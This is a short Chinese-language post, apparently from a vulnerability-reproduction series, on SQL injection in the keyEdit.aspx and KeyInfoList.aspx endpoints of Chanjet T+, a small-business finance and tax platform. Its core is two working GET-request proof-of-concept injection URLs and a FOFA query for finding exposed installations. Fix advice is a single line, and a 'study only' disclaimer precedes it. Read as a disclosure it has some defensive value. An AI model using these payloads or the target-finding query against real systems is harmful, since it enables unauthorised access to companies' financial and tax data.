前言

免責(zé)聲明：請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負(fù)責(zé)，所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。

---

一、產(chǎn)品簡(jiǎn)介

暢捷通-TPlus是一個(gè)為中小企業(yè)設(shè)計(jì)的財(cái)稅云服務(wù)平臺(tái)，提供財(cái)務(wù)、稅務(wù)管理和發(fā)票處理功能，支持低代碼開(kāi)發(fā)，幫助企業(yè)實(shí)現(xiàn)數(shù)字化和智能化經(jīng)營(yíng)管理。

二、漏洞描述

該系統(tǒng)的keyEdit.aspx、KeyInfoList.aspx接口存在sql注入漏洞

三、影響范圍

未知

四、復(fù)現(xiàn)環(huán)境

FOFA：

app="暢捷通-TPlus"

五、漏洞復(fù)現(xiàn)

1.訪問(wèn)存在漏洞的網(wǎng)站

2.直接以GET方式請(qǐng)求

POC1:

http://127.0.0.1/tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+

POC2

http://127.0.0.1/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--&preload=1

3.成功

六、修復(fù)建議

關(guān)閉互聯(lián)網(wǎng)暴露面訪問(wèn)的權(quán)限，及時(shí)更新系統(tǒng)

---

參考鏈接

https://blog.csdn.net/ahhacker86/article/details/138482856
https://blog.csdn.net/wan___she__pi/article/details/137461590

---